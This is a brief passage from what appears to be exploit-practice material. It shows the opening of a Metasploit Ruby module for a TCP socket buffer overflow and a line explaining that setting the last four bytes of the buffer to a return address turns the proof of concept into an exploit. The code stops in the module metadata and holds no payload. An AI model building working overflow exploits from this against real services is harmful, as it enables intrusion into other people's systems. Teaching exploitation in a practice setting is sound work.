The PoC code is below. To turn it into an exploit, assemble buf and modify its last 4 bytes, which hold the return address, to achieve the attack.
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Mixin that provides the TCP client socket helpers
  include Msf::Exploit::Remote::Tcp

  # Register the module metadata with the framework
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'JYH Socket Overflow testing',
      'Description' => %q{
        this module is exploit practice
        "Vulnerability Exploit and Analysis Technique"
      },
      'Author' => 'JYH',
      'License' => MSF_LICENSE,
      'Version' => '1.0',
      'References' =>
        [
[ 'CVE&#